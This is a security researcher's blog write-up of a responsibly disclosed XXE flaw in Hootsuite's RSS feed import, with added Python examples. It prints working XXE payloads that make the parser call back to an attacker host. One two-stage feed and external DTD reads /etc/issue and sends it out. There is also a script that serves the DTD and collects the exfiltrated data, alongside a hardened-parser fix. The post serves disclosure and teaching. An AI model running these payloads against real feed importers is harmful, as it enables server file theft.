Yasin Soliman

I'm Yasin, a security analyst and OSCP from the UK, interested in web application testing and red team operations. This is my personal blog for sharing research findings.

From RSS to XXE: feed parsing on Hootsuite

Yasin Soliman

Mike Knoop's research into XXE exploitation inspired me to experiment with RSS parsing on Hootsuite.

XML External Entity (XXE) vulnerabilities arise when an XML parser that is configured to resolve external entities processes attacker-controlled input whose DOCTYPE declares an entity with a SYSTEM identifier: the parser fetches that URL or file and substitutes the result wherever the entity is referenced.

Within fifteen minutes of testing, I had gained a pingback and demonstrated an exfiltration of /etc/issue.


Hootsuite is the world's most widely used platform for managing social media. More than 15 million users, including 800+ of the Fortune 1000 companies, trust Hootsuite to manage their social media programs across multiple social networks from one integrated dashboard.

Getting a pingback in production

Using Mike's XML file as a model, I declared an "xxe" SYSTEM entity that delivers a pingback: a simple GET request, issued by the parsing host, to my "attacker" Apache server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE title [ <!ELEMENT title ANY >  
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>  
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>XXE Test Blog</title>
    <link>http://example.com/</link>
    <description>XXE Test Blog</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&xxe;</title>
        <link>http://example.com</link>
        <description>Test Post</description>
        <author>author@example.com</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

With tail -f running on the Apache access log, I clicked "Save Feed" and waited in anticipation.

One second later, access.log lit up with a pingback: Hootsuite's feed parser had resolved the SYSTEM entity and fetched my URL, confirming that the server was vulnerable to external entity injection.
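What the feed parser is doing on the server side with that SYSTEM entity, and what the fix looks like, can be reproduced locally. The following is an added example using Python's standard-library SAX parser (expat); it is not code from the post or from Hootsuite, whose parser is not identified here. To run offline it points the entity at a constructed temporary file rather than an http:// callback; in Python's expat reader both file:// and http:// identifiers are fetched through the same external-entity handler, so the pingback variant differs only in where the evidence appears (the attacker's access log instead of the item title).

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the feed submitted to the dashboard: the DOCTYPE
# declares an external entity and the item title references it. The SYSTEM
# identifier is filled in at run time (a file:// URL here, http:// in the post).
FEED_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "{system_id}" >]>
<rss version="2.0">
<channel>
    <title>XXE Test Blog</title>
    <item>
        <title>&xxe;</title>
        <link>http://example.com</link>
    </item>
</channel>
</rss>
"""


class ItemTitles(ContentHandler):
    """Collects the text of each <item><title>, the field a feed importer stores."""

    def __init__(self):
        super().__init__()
        self.titles = []
        self._in_item = False
        self._buf = None

    def startElement(self, name, attrs):
        if name == "item":
            self._in_item = True
        elif name == "title" and self._in_item:
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "item":
            self._in_item = False
        elif name == "title" and self._buf is not None:
            self.titles.append("".join(self._buf))
            self._buf = None


def parse_feed(feed_xml, resolve_external_entities):
    """Parse an RSS document and return its item titles.

    resolve_external_entities=True reproduces the vulnerable configuration: expat
    follows SYSTEM identifiers (file://, http://, ...) and splices the fetched
    bytes into the document. False is Python's default since 3.7.1 and is the
    hardened setting: the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = ItemTitles()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(feed_xml.encode("utf-8")))
    return handler.titles


def demo():
    """Parse the same feed twice and return (vulnerable titles, hardened titles)."""
    # Constructed stand-in for /etc/issue so the example never reads real system files.
    with tempfile.NamedTemporaryFile("w", suffix="-issue", delete=False) as fh:
        fh.write("Ubuntu 14.04 LTS (constructed sample)")
        secret_path = fh.name
    try:
        feed = FEED_TEMPLATE.format(system_id=Path(secret_path).as_uri())
        leaked = parse_feed(feed, resolve_external_entities=True)
        safe = parse_feed(feed, resolve_external_entities=False)
        return leaked, safe
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser item title:", leaked)
    print("hardened parser item title:  ", safe)
```

The hardened call is the whole fix on the parser side: with external general entities disabled the reference to &xxe; is simply skipped, so the feed is still accepted but nothing is fetched. Parsers built on libxml2 need the equivalent options (no entity substitution, no DTD loading, no network access) set explicitly.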

Testing with /etc/issue

Transferring notes across my slew of TextEdit windows, I decided to craft a two-part payload (an RSS feed plus an external DTD) to demonstrate exploitability: read the /etc/issue version file on the server and exfiltrate its contents to my Apache attack server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE roottag [  
<!ENTITY % file SYSTEM "file:///etc/issue">  
<!ENTITY % dtd SYSTEM "http://<WebServer>/xxe.dtd">  
%dtd;]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>&file; &dtd;</title>
    <link>http://example.com/</link>
    <description>&send;</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&file; &dtd;</title>
        <link>http://example.com</link>
        <description>&send;</description>
        <author>author@example.com</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

As you can see, line 4 of the feed loads an external Document Type Definition ("xxe.dtd") through the %dtd; parameter entity. The indirection is required: XML forbids parameter-entity references inside markup declarations in the internal subset, so the declaration that splices %file; into a URL has to come from an external DTD. That DTD delivers the contents of /etc/issue in a pingback:

<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<AttackIP>/XXE?%file;'>">  
%all;

Upon submitting the new XML file to the Dashboard as an RSS feed, Apache lit up with a second pingback: the contents of /etc/issue, exfiltrated straight across to the server.

Figure: XXE pingback on Hootsuite in production
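Reproducing the two-stage delivery needs an attacker-side host that serves xxe.dtd and records the callback. The script below is an added example of my own (not the author's tooling and not Hootsuite code) that generates both stages for a chosen target file and callback URL, runs a small receiver in place of the author's Apache server, and decodes a callback out of an Apache-style access log line. The bind address, port, the /XXE path marker and the sample log line in the usage are constructed for illustration.

```python
import re
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Stage one. Only &send; is referenced in the body: %file; and %dtd; are
# parameter entities and are consumed while the DTD is processed.
FEED_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "{target}">
<!ENTITY % dtd SYSTEM "{dtd_url}">
%dtd;]>
<rss version="2.0">
<channel>
    <title>XXE Test Blog</title>
    <link>http://example.com/</link>
    <description>&send;</description>
    <item>
        <title>XXE Test Post</title>
        <link>http://example.com</link>
        <description>&send;</description>
    </item>
</channel>
</rss>
"""


def build_feed(target, dtd_url):
    """Return the feed to submit; it names the file to read and the DTD to fetch."""
    return FEED_TEMPLATE.format(target=target, dtd_url=dtd_url)


def build_dtd(callback_url):
    """Stage two: the external DTD. A parameter-entity reference inside a markup
    declaration is only permitted in an external subset, which is why the nested
    declaration lives here. Expanding %all; declares &send; with the file
    contents spliced into the callback URL."""
    if any(c in callback_url for c in "\"'%"):
        raise ValueError("callback URL must not contain quotes or %")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!ENTITY % all "<!ENTITY send SYSTEM \'{callback_url}?%file;\'>">\n'
        "%all;\n"
    )


def exfil_from_path(path, marker="/XXE"):
    """Return the data carried in a callback request path, or None for other
    hits (such as the bare pingback from the first payload)."""
    parts = urllib.parse.urlsplit(path)
    if parts.path != marker or not parts.query:
        return None
    return urllib.parse.unquote(parts.query)


# Apache common/combined log format keeps the request line between double quotes.
# The request target is captured greedily because the parser sends the file
# contents raw, so the logged target may itself contain spaces.
_REQUEST_LINE = re.compile(r'"GET (.*) HTTP/\d(?:\.\d)?"')


def exfil_from_log_line(line, marker="/XXE"):
    """Decode a callback from an Apache access.log line (what the post read with tail -f)."""
    m = _REQUEST_LINE.search(line)
    return exfil_from_path(m.group(1), marker) if m else None


class CallbackHandler(BaseHTTPRequestHandler):
    """Serves xxe.dtd and records whatever arrives on the callback path.
    Note: BaseHTTPRequestHandler answers 400 to a request line whose target
    contains a raw space, a limitation this receiver has and Apache did not
    show in the post; percent-encoded data is decoded fine."""
    dtd_body = b""
    received = []

    def do_GET(self):
        if self.path == "/xxe.dtd":
            self._reply(self.dtd_body, "application/xml-dtd")
            return
        data = exfil_from_path(self.path)
        if data is not None:
            self.received.append(data)
            print("exfiltrated:", repr(data), file=sys.stderr)
        # The response body becomes the replacement text of &send; on the
        # target, so keep it empty rather than returning HTML that would be
        # parsed as XML there.
        self._reply(b"", "text/plain")

    def _reply(self, body, content_type):
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(host, port, target="file:///etc/issue"):
    """Print the stage-one feed to submit, then wait for the DTD fetch and callback."""
    base = f"http://{host}:{port}"
    CallbackHandler.dtd_body = build_dtd(f"{base}/XXE").encode("utf-8")
    print(build_feed(target, f"{base}/xxe.dtd"))
    HTTPServer((host, port), CallbackHandler).serve_forever()


if __name__ == "__main__":
    # Constructed defaults: pass the address the target can reach as argv[1].
    serve(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1", 8080)
```

Run it on the attack host, paste the printed feed into the target, and watch stderr: the first request is the DTD fetch, the second carries the file contents in the query string. A constructed log line such as `"GET /XXE?Ubuntu 14.04 LTS HTTP/1.0"` decodes to `Ubuntu 14.04 LTS` through exfil_from_log_line, which is the same read the author did by eye on access.log.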

Files with more content, or with characters that cannot appear in the URL or the entity declaration (e.g. & and newlines), break this exfiltration, because the file contents are spliced raw into the SYSTEM literal of the send entity and sent as a single GET request. The short, plain-text /etc/issue file is therefore a safe test case for confirming an XML External Entity issue without pulling anything sensitive.

At this point, I decided to wrap things up and prepare a summary. Notes collated, I sent an email to security@hootsuite.com.

Conclusion

This vulnerability was responsibly disclosed to Hootsuite; recognition has been provided on the Security page.

I would like to commend Pablo from Security Operations for handling this report promptly and professionally, and the Hootsuite development team for a swift remediation.

Research timeline

The following timestamps are provided in GMT.

Public disclosure was requested several weeks after confirmation of the fix:
